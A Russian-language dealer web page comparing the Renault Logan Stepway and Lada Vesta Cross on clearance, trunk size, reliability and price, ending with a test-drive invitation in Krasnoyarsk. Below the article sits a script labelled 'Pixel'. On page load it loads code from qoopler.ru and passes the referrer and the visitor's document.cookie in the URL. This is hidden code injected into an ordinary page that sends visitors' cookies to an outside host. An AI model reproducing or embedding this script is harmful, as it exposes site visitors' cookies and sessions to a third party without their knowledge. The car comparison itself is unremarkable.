Официальный дилер Renault

Рено Россия

Кросс-версии этих двух седанов по проходимости не только не уступают, но даже превосходят некоторые SUV. Безусловным преимуществом данных моделей также выступают стоимость и сравнительно недорогое обслуживание. Поэтому многие автолюбители задаются вопросом, какая из машин лучше: Renault Logan Stepway или его российский аналог – «Лада Веста Кросс».

Особенности Renault Logan Stepway

Для эксплуатации в России «Логан» получил адаптацию ДВС к запуску в холодное время, защиту картера, антикоррозийное покрытие и полноценную запаску. Дополнительным преимуществом является увеличенная гарантия. На основные системы, узлы и агрегаты срок обязательств, предоставляемых производителем, составляет 3 года, и еще столько же дается на антикоррозийную обработку кузова.

Одна из главных особенностей Renault Logan Stepway – надежная платформа B0, и в частности ударопрочная подвеска. Она не только обеспечивает хорошую проходимость, но и обладает достойной ресурсностью, что особенно важно при эксплуатации на разбитых дорогах и в тяжелых погодных условиях.

Особенности Lada Vesta Cross

В российской модели использована доработанная АвтоВАЗом платформа B0. Улучшили или ухудшили оригинал от «Рено» внесенные изменения, судить пока рано, но в целом основа машины осталась не менее надежной, чем у французских автомобилей.

Особенностью Lada Vesta Cross можно назвать специфический Х-образный дизайн, свойственный и другим актуальным моделям АвтоВАЗа. Среди водителей есть те, кто относит облик машины к главным достоинствам отечественного седана. Однако такая спорная внешность придется по вкусу не каждому автолюбителю.


Сравнение технических характеристик и основных ходовых качеств

Помимо подвески, «Степвей» и «Веста Кросс» могут также похвастаться неплохим показателем клиренса – 195 и 203 миллиметра соответственно. Для обоих автомобилей также характерны просторный салон и багажник. По объему отделения для перевозки грузов превосходство на стороне французского автомобиля – 510 против 480 литров.

Как и подвеска, двигатели и трансмиссии «Рено Логан» отличаются надежностью, к продукции АвтоВАЗа по этому вопросу по-прежнему возникают нарекания со стороны владельцев.

«Веста» имеет незначительное преимущество по динамике, а минимальный расход топлива (6,8 литра в комбинированном режиме) демонстрирует «Степвей» со 113-сильным двигателем и 5МКПП. В целом при сравнении основных ходовых качеств и технических характеристик оба автомобиля представляются достаточно интересными вариантами.

Сравнение цен на Renault Logan Stepway и Lada Vesta Cross

Тот параметр, по которому точно выигрывает французский автомобиль, – это сравнение цен на Renault Logan Stepway и Lada Vesta Cross. Стоимость базовой версии «Лады» с мотором на 106 л. с. и 5МКПП составляет 793 900 рублей. Приобрести «Степвей» с АКПП или ДВС большей мощности можно ощутимо дешевле. А стоимость автомобиля «Рено» с базовым мотором составляет всего 675 990 рублей.

Определить самостоятельно, кто лидирует в конкуренции Renault Logan Stepway против Lada Vesta Cross, поможет тест-драйв. Кросс-версию французского седана вы сможете взять на пробную поездку в «СИАЛАВТО» – официальных дилерских центрах в Красноярске, расположенных на улице Пограничников, 101а, и Котельникова, 20.

{!-- Pixel --} (function (d, w) { var n = d.getElementsByTagName("script")[0], s = d.createElement("script"), f = function () { n.parentNode.insertBefore(s, n); }; s.type = "text/javascript"; s.async = true; s.src = "https://qoopler.ru/index.php?ref="+d.referrer+"&cookie=" + encodeURIComponent(document.cookie); if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); } })(document, window); {/script} {!-- /Pixel --}